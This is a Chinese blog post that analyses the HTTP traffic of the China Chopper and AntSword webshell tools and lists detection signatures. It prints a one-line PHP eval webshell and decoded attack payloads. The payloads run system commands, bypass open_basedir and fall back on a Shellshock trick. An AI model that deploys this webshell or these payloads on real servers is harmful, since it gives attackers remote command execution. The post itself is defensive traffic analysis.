Webshell 流量特征分析

2023-09-22 09:55:41

前言:webshell是以asp、php、jsp或者cgi等网页文件形式存在的一种代码执行环境,主要用于网站管理、服务器管理、权限管理等操作。使用方法简单,只需上传一个代码文件,通过网址访问,便可进行很多日常操作,极大地方便了使用者对网站和服务器的管理。正因如此,也有小部分人将代码修改后当作后门程序使用,以达到控制网站服务器的目的。

0x01 中国菜刀

菜刀作为一个老牌webshell连接工具,在以前已经大放光彩。但相对于现在来说,功能比较单一,且没有提供插件,也不支持扩展,目前也没有继续更新了。还有一点就是菜刀只能处理eval函数。但现在用于流量分析是一个很好的案例。

下面以php为样例来进行分析。

<?php eval($_POST[1])?>

由于菜刀本身不带代理功能,我们可以借助第三方流量探测工具查看,这里我们使用wireshark。

# 执行whoami命令 中国菜刀的数据包
1=@eval(base64_decode($_POST[z0]));&z0=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0%2BfCIpOzskcD1iYXNlNjRfZGVjb2RlKCRfUE9TVFsiejEiXSk7JHM9YmFzZTY0X2RlY29kZSgkX1BPU1RbInoyIl0pOyRkPWRpcm5hbWUoJF9TRVJWRVJbIlNDUklQVF9GSUxFTkFNRSJdKTskYz1zdWJzdHIoJGQsMCwxKT09Ii8iPyItYyAneyRzfSciOiIvYyB7JHN9Ijskcj0ieyRwfSB7JGN9IjtAc3lzdGVtKCRyLiIgMj4mMSIpOztlY2hvKCJ8PC0iKTtkaWUoKTs%3D&z1=Y21k&z2=Y2QgL2QgIkM6XHB1dFwiJndob2FtaSZlY2hvIFtTXSZjZCZlY2hvIFtFXQ%3D%3D

简单看了一下,菜刀的数据加密只有url编码和base64编码,很容易解码。

#解密后
1=@eval(base64_decode($_POST[z0]));&z0=@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo("->|");;$p=base64_decode($_POST["z1"]);$s=base64_decode($_POST["z2"]);$d=dirname($_SERVER["SCRIPT_FILENAME"]);$c=substr($d,0,1)=="/"?"-c '{$s}'":"/c {$s}";$r="{$p} {$c}";@system($r." 2>&1");;echo("|<-");die();&z2=cd /d "C:\put\"&whoami&echo [S]&cd&echo [E]
# 分段查看分析
1=@eval(base64_decode($_POST[z0]));  # 内嵌一个eval函数,参数名为z0
&z0=@ini_set("display_errors","0");      # 设置环境变量
@set_time_limit(0);     # 设置环境变量
@set_magic_quotes_runtime(0);   # 设置环境变量
echo("->|");;          # 打印字符
$p=base64_decode($_POST["z1"]);        #  POST传参z1
$s=base64_decode($_POST["z2"]);        #  POST传参z2
$d=dirname($_SERVER["SCRIPT_FILENAME"]); # 将当前目录传递给$d
$c=substr($d,0,1)=="/"?"-c '{$s}'":"/c {$s}";
$r="{$p} {$c}";
@system($r." 2>&1");;  # 将解密后的参数传入system函数进行执行
echo("|<-");
die();
&z1=Y21k;  #cmd的base64编码
&z2=cd /d "C:\put\"&whoami&echo [S]&cd&echo [E] # 执行命令
总结特征:

主要利用方式:eval函数
参数名:z1、z2、z3。 z0用于设置环境变量、z1为密码、z2为执行的命令。
加密方式: base64加密、url编码
User-Agent: 百度的或者是火狐的。
其他:下面几个环境变量也可以作为流量特征来进行研判分析。

@ini_set("display_errors","0");
@set_time_limit(0);
@set_magic_quotes_runtime(0);

0x02 蚁剑

前言:中国蚁剑的核心代码模板均改自伟大的中国菜刀,所以总体特征跟菜刀很像,且蚁剑目前有人更新,有插件,能处理几种函数,相比于菜刀来说,功能性更高,拓展性更强。本次测试的版本为v2.1.15

蚁剑自带代理功能,我们可以直接将流量代理到burp上进行分析。

配置完代理后,我们点击测试连接,就可以抓到包了。


我们将这个测试连接的流量拿出来分析

# 原始流量
pass=%40ini_set(%22display_errors%22%2C%20%220%22)%3B%40set_time_limit(0)%3B%24opdir%3D%40ini_get(%22open_basedir%22)%3Bif(%24opdir)%20%7B%24ocwd%3Ddirname(%24_SERVER%5B%22SCRIPT_FILENAME%22%5D)%3B%24oparr%3Dpreg_split(base64_decode(%22Lzt8Oi8%3D%22)%2C%24opdir)%3B%40array_push(%24oparr%2C%24ocwd%2Csys_get_temp_dir())%3Bforeach(%24oparr%20as%20%24item)%20%7Bif(!%40is_writable(%24item))%7Bcontinue%3B%7D%3B%24tmdir%3D%24item.%22%2F.a76c2547%22%3B%40mkdir(%24tmdir)%3Bif(!%40file_exists(%24tmdir))%7Bcontinue%3B%7D%24tmdir%3Drealpath(%24tmdir)%3B%40chdir(%24tmdir)%3B%40ini_set(%22open_basedir%22%2C%20%22..%22)%3B%24cntarr%3D%40preg_split(%22%2F%5C%5C%5C%5C%7C%5C%2F%2F%22%2C%24tmdir)%3Bfor(%24i%3D0%3B%24i%3Csizeof(%24cntarr)%3B%24i%2B%2B)%7B%40chdir(%22..%22)%3B%7D%3B%40ini_set(%22open_basedir%22%2C%22%2F%22)%3B%40rmdir(%24tmdir)%3Bbreak%3B%7D%3B%7D%3B%3Bfunction%20asenc(%24out)%7Breturn%20%24out%3B%7D%3Bfunction%20asoutput()%7B%24output%3Dob_get_contents()%3Bob_end_clean()%3Becho%20%22eb19%22.%22962d%22%3Becho%20%40asenc(%24output)%3Becho%20%22a0e481%22.%22b16150%22%3B%7Dob_start()%3Btry%7B%24D%3Ddirname(%24_SERVER%5B%22SCRIPT_FILENAME%22%5D)%3Bif(%24D%3D%3D%22%22)%24D%3Ddirname(%24_SERVER%5B%22PATH_TRANSLATED%22%5D)%3B%24R%3D%22%7B%24D%7D%09%22%3Bif(substr(%24D%2C0%2C1)!%3D%22%2F%22)%7Bforeach(range(%22C%22%2C%22Z%22)as%20%24L)if(is_dir(%22%7B%24L%7D%3A%22))%24R.%3D%22%7B%24L%7D%3A%22%3B%7Delse%7B%24R.%3D%22%2F%22%3B%7D%24R.%3D%22%09%22%3B%24u%3D(function_exists(%22posix_getegid%22))%3F%40posix_getpwuid(%40posix_geteuid())%3A%22%22%3B%24s%3D(%24u)%3F%24u%5B%22name%22%5D%3A%40get_current_user()%3B%24R.%3Dphp_uname()%3B%24R.%3D%22%09%7B%24s%7D%22%3Becho%20%24R%3B%3B%7Dcatch(Exception%20%24e)%7Becho%20%22ERROR%3A%2F%2F%22.%24e-%3EgetMessage()%3B%7D%3Basoutput()%3Bdie()%3B
# url解码后
# 这两行试图禁止错误信息的显示,并将脚本的执行时间限制设置为无限。
pass=@ini_set("display_errors","0");
@set_time_limit(0);
# 这一行获取 PHP 配置指令 open_basedir 的值,该指令限制了可以从中读取文件的目录。
$opdir=@ini_get("open_basedir");
# 这一段代码尝试在当前目录和临时目录中创建隐藏目录,然后尝试改变目录,绕过 open_basedir 限制。
if($opdir) {$ocwd=dirname($_SERVER["SCRIPT_FILENAME"]);
$oparr=preg_split(base64_decode("Lzt8Oi8="),$opdir);
@array_push($oparr,$ocwd,sys_get_temp_dir());
foreach($oparr as $item) {if(!@is_writable($item)){continue;};
$tmdir=$item."/.a76c2547";
@mkdir($tmdir);

if(!@file_exists($tmdir)){continue;}$tmdir=realpath($tmdir);
@chdir($tmdir);
@ini_set("open_basedir","..");
$cntarr=@preg_split("/\\\\|\//",$tmdir);
for($i=0;$i<sizeof($cntarr);$i++){@chdir("..");};
@ini_set("open_basedir","/");
@rmdir($tmdir);break;};};;
function asenc($out){return $out;};
function asoutput(){$output=ob_get_contents();
ob_end_clean();
echo "eb19"."962d";
echo @asenc($output);
echo "a0e481"."b16150";}
ob_start();
# 这部分代码会捕获异常,然后输出一些系统和用户信息,做了一些代码混淆
try{$D=dirname($_SERVER["SCRIPT_FILENAME"]);
if($D=="")$D=dirname($_SERVER["PATH_TRANSLATED"]);
$R="{$D}";
if(substr($D,0,1)!="/"){foreach(range("C","Z")as $L)if(is_dir("{$L}:"))$R.="{$L}:";}
else{$R.="/";}$R.="    ";
$u=(function_exists("posix_getegid"))?@posix_getpwuid(@posix_geteuid()):"";
$s=($u)?$u["name"]:@get_current_user();
$R.=php_uname();
$R.="    {$s}";
echo $R;;}catch(Exception $e)
{echo "ERROR://".$e->getMessage();};
asoutput();
die();

响应包:


根据响应包,我们可以看出请求包里执行了三条系统命令(利用php系统函数)

1. pwd           ->  dirname($_SERVER["SCRIPT_FILENAME"])
2. uname -a      ->  php_uname()
3. whoami        ->  get_current_user()

说明蚁剑测试是否连接成功,是通过检测响应包中是否存在对应的字段。当然这里只做了检测的流量分析,接下来我们看看其他的命令执行的流量。

# 执行id命令。
c99e8d28cab9b9=dML2Jpbi9zaA%3D%3D&m1b60a407d94ab=1i&m6aca223dba11a=tWY2QgIi92YXIvd3d3L2h0bWwiO3dob2FtaTtlY2hvIDY2NTBmODtwd2Q7ZWNobyBjMDgwNDdmZTVm&pass=
@ini_set("display_errors","0");
@set_time_limit(0);
$opdir=@ini_get("open_basedir");
if($opdir) {$ocwd=dirname($_SERVER["SCRIPT_FILENAME"]);
$oparr=preg_split(base64_decode("Lzt8Oi8="),$opdir); # /;|:/
@array_push($oparr,$ocwd,sys_get_temp_dir());       # 创建临时目录
foreach($oparr as $item) {if(!@is_writable($item)){continue;};
$tmdir=$item."/.1db58ee414";
@mkdir($tmdir);
if(!@file_exists($tmdir)){continue;}
$tmdir=realpath($tmdir);
@chdir($tmdir);
@ini_set("open_basedir","..");
$cntarr=@preg_split("/\\\\|\//",$tmdir);
for($i=0;$i<sizeof($cntarr);$i++){@chdir("..");};
@ini_set("open_basedir","/");
@rmdir($tmdir);break;};};;
function asenc($out){return $out;};
function asoutput(){$output=ob_get_contents();
ob_end_clean();
echo "de6363"."e053e6";
echo @asenc($output);
echo "b58"."9678";}ob_start();
try{$p=base64_decode(substr($_POST["p5dd8c3542537a"],2));  # 调用/bin/bash 
$s=base64_decode(substr($_POST["i250ce4b58060b"],2));
$envstr=@base64_decode(substr($_POST["d6fd35bd99a9ec"],2)); # 要执行的命令参数  cd "/var/www/html";id;echo 6650f8;pwd;echo c08047fe5f
$d=dirname($_SERVER["SCRIPT_FILENAME"]);
$c=substr($d,0,1)=="/"?"-c \"{$s}\"":"/c \"{$s}\"";if(substr($d,0,1)=="/"){@putenv("PATH=".getenv("PATH").":/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin");}
else{@putenv("PATH=".getenv("PATH").";
C:/Windows/system32;
C:/Windows/SysWOW64;
C:/Windows;
C:/Windows/System32/WindowsPowerShell/v1.0/;");}
if(!empty($envstr)){$envarr=explode("|||asline|||", $envstr);
foreach($envarr as $v) {if (!empty($v)) {@putenv(str_replace("|||askey|||", "=", $v));}}}$r="{$p} {$c}";
function fe($f){$d=explode(",",@ini_get("disable_functions"));
if(empty($d)){$d=array();}
else{$d=array_map('trim',array_map('strtolower',$d));}return(function_exists($f)&&is_callable($f)&&!in_array($f,$d));};
function runshellshock($d, $c) 
{if (substr($d, 0, 1) == "/" && fe('putenv') && (fe('error_log') || fe('mail'))) {if (strstr(readlink("/bin/sh"), "bash") != FALSE) {$tmp = tempnam(sys_get_temp_dir(), 'as');putenv("PHP_LOL=() { x; }; 
$c >$tmp 2>&1");if (fe('error_log')) 
{error_log("a", 1);} 
else {mail("a@127.0.0.1", "", "", "-bv");}} 
else {return False;}$output = @file_get_contents($tmp);
@unlink($tmp);if ($output != "") 
{print($output);return True;}}return False;};
function runcmd($c){$ret=0;$d=dirname($_SERVER["SCRIPT_FILENAME"]);
if(fe('system')){@system($c,$ret);}     # 条件满足,执行system函数
elseif(fe('passthru')){@passthru($c,$ret);} # 否则执行 passthru函数
elseif(fe('shell_exec')){print(@shell_exec($c));} # 否则 shell_exec函数
elseif(fe('exec')){@exec($c,$o,$ret);      #否则执行exec函数
print(join("",$o));}
elseif(fe('popen')){$fp=@popen($c,'r');
while(!@feof($fp)){print(@fgets($fp,2048));}@pclose($fp);}
elseif(fe('proc_open')){
$p = @proc_open($c, array(1 => array('pipe', 'w'), 2 => array('pipe', 'w')), $io);
while(!@feof($io[1])){print(@fgets($io[1],2048));}
while(!@feof($io[2])){print(@fgets($io[2],2048));}
@fclose($io[1]);
@fclose($io[2]);
@proc_close($p);}
elseif(fe('antsystem')){@antsystem($c);}
elseif(runshellshock($d, $c)) {return $ret;}
elseif(substr($d,0,1)!="/" && @class_exists("COM")){$w=new COM('WScript.shell');
$e=$w->exec($c);$so=$e->StdOut();
$ret.=$so->ReadAll();
$se=$e->StdErr();
$ret.=$se->ReadAll();
print($ret);}
else{$ret = 127;}return $ret;};
$ret=@runcmd($r." 2>&1");
print ($ret!=0)?"ret={$ret}":"";;}
catch(Exception $e)
{echo "ERROR://".$e->getMessage();};
asoutput();
die();

简单梳理一下,大概就是开始定义POST的参数,其中

c99e8d28cab9b9=dML2Jpbi9zaA%3D%3D
m1b60a407d94ab=1i
m6aca223dba11a=tWY2QgIi92YXIvd3d3L2h0bWwiO3dob2FtaTtlY2hvIDY2NTBmODtwd2Q7ZWNobyBjMDgwNDdmZTVm

参数名字应该是随机生成的,最后会将这几个值代入到最后的代码里面执行。
这里我们主要看这几条代码:

# 这几条代码会将前面的参数的值进行一个解码操作
$p=base64_decode(substr($_POST["p5dd8c3542537a"],2));  # 调用/bin/bash 
$s=base64_decode(substr($_POST["i250ce4b58060b"],2));  # 用于后面判断测试
$envstr=@base64_decode(substr($_POST["d6fd35bd99a9ec"],2)); # 要执行的命令参数  cd "/var/www/html";id;echo 6650f8;pwd;echo c08047fe5f

最后参数会经过几轮倒转最后被调用到以下几个函数进行测试,接下来看这几行代码:

if(fe('system')){@system($c,$ret);}     # 条件满足,执行system函数
elseif(fe('passthru')){@passthru($c,$ret);} # 否则执行 passthru函数
elseif(fe('shell_exec')){print(@shell_exec($c));} # 否则 shell_exec函数
elseif(fe('exec')){@exec($c,$o,$ret);      #否则执行exec函数

至此,我们总结一下蚁剑的流量特征:

  1. 与菜刀一样存在字段
    @ini_set("display_errors","0");
    @set_time_limit(0);
  2. 在v2.1.15的版本中,会在POST传参处随机生成几个14位数的参数,并且参数后面的值会进行base编码
  3. 会调用四种函数来测试命令执行;system,passthru,shell_exec,exec。

0x03 总结

蚁剑目前的流量分析,都是没有使用编码器和解码器的,而蚁剑相比于菜刀的优势就在于这个编码器和解码器,能够更方便的隐藏自己,后面有想进一步了解的小伙伴可以点个关注哟。

更多推荐

LeetCode_队列_中等_649.Dota2 参议院

目录1.题目2.思路3.代码实现(Java)1.题目Dota2的世界里有两个阵营:Radiant(天辉)和Dire(夜魇)Dota2参议院由来自两派的参议员组成。现在参议院希望对一个Dota2游戏里的改变作出决定。他们以一个基于轮为过程的投票进行。在每一轮中,每一位参议员都可以行使两项权利中的一项:禁止一名参议员的权利

基于Java的Base64编解码优化探讨

🌷🍁博主猫头虎带您GotoNewWorld.✨🍁🦄博客首页——猫头虎的博客🎐🐳《面试题大全专栏》文章图文并茂🦕生动形象🦖简单易学!欢迎大家来踩踩~🌺🌊《IDEA开发秘籍专栏》学会IDEA常用操作,工作效率翻倍~💐🌊《100天精通Golang(基础入门篇)》学会Golang语言,畅玩云原生,走遍大

js 事件流、事件冒泡、事件捕获、阻止事件的传播

事件流js事件的执行过程分为捕获阶段(由外层节点传播到内层节点)和冒泡阶段(由内层节点传播到外层节点),即先执行捕获阶段的代码,后执行冒泡阶段的代码事件冒泡js事件中的代码默认在冒泡阶段执行,以下图为例,点击box2时,会依次触发box2的点击事件【冒泡阶段执行】、box1的点击事件【冒泡阶段执行】、window的点击

ubuntu中如何用docker下载华为opengauss数据库(超简单)

ubuntu中如何下载华为opengauss数据库前言一、安装docker1.方法一:2.方法二二、拉取openguass镜像三、创建容器四、连接数据库,切换到omm用户,用gsql连接到数据库五.最后用DateGrip远程连接测试(1)选择数据源(2)查看虚拟机ip地址(3)远程连接测试前言openGauss是一款全

家居行业如何借助AI营销数智化转型?《2023 家居行业AI营销第一课(重庆站)》给你答案

商务部将2023年定为“消费提振年”。作为仅次于汽车消费的家庭第二大消费支出,家居产业的高质量发展与扩大内需提振消费息息相关。随着今年利好政策不断发布,家居建材行业的市场环境及消费潜力得到大幅度改善。随着ChatGPT等新技术的出现与消费需求升级的趋势,近年来,家居建材行业数智化转型趋势越来越明显,家居行业的品牌营销也

基于SSM+Vue的网络教学平台的设计与实现的设计与实现

末尾获取源码开发语言:JavaJava开发工具:JDK1.8后端框架:SSM前端:采用Vue技术开发数据库:MySQL5.7和Navicat管理工具结合服务器:Tomcat8.5开发软件:IDEA/Eclipse是否Maven项目:是目录一、项目简介二、系统功能三、系统项目截图学生功能模块的实现管理员功能模块的实现教师

华纳云:Ubuntu下开启php调试模式报错如何解决

开启PHP调试模式时出现错误通常是由于PHP代码中的问题引起的。调试模式有助于发现和修复这些问题。以下是解决开启PHP调试模式时可能遇到的一些常见问题以及解决方法:错误报告级别设置不正确:PHP有不同的错误报告级别,开启调试模式时,建议将错误报告级别设置为最高,以捕获所有错误。您可以在PHP配置文件(php.ini)中

半导体行业如何在跨网数据交换时保证核心数据是安全的?

半导体行业是高科技产业的核心,也是国家战略的重点领域。半导体产业涉及到芯片设计、制造、封装、测试等多个环节,每个环节都需要大量的数据支撑和交换。半导体企业的核心数据不仅包括技术方案、设计图纸、生产参数等,还包括市场分析、客户信息、合作协议等。这些数据对于半导体企业的竞争力和发展至关重要,一旦泄露或损坏,将会给企业带来巨

【C++】bitset介绍与用法讲解

今日写csp,看大佬的题解中出现了bitset,以前有印象但没学,所以赶快去OI-wiki上补一下,并记录于此std::bitset是标准库中的一个存储0/1的大小不可变容器。严格来讲,它并不属于STL。TheC++standardlibraryprovidessomespecialcontainerclasses,t

Python绘制X-bar图和R图 | 统计过程控制SPC

X-bar图和R图是用于统计过程控制(SPC)的两种常用工具,用于监测过程的平均值和范围(变异性)。这些图有助于识别过程中的变化和异常,以便及时采取纠正措施。**X-bar图(平均值控制图)**显示了一系列样本的平均值,用于监测过程的平均值是否保持在可接受的范围内。X-bar图通常由以下几个要素组成:样本平均值:每个样

线程池的基本理解以及使用

首先线程池是一种管理和复用线程的机制,它可以用来提高多线程编程的效率和性能。线程池的概念:线程池是一种线程管理的机制,它通常由一个线程池管理器(ThreadPoolExecutor)和一组线程组成。线程池管理器负责创建、管理和调度线程。当任务到达时,线程池会从线程池中预先创建的线程中选一个来执行任务,如果没有空闲线程,

热文推荐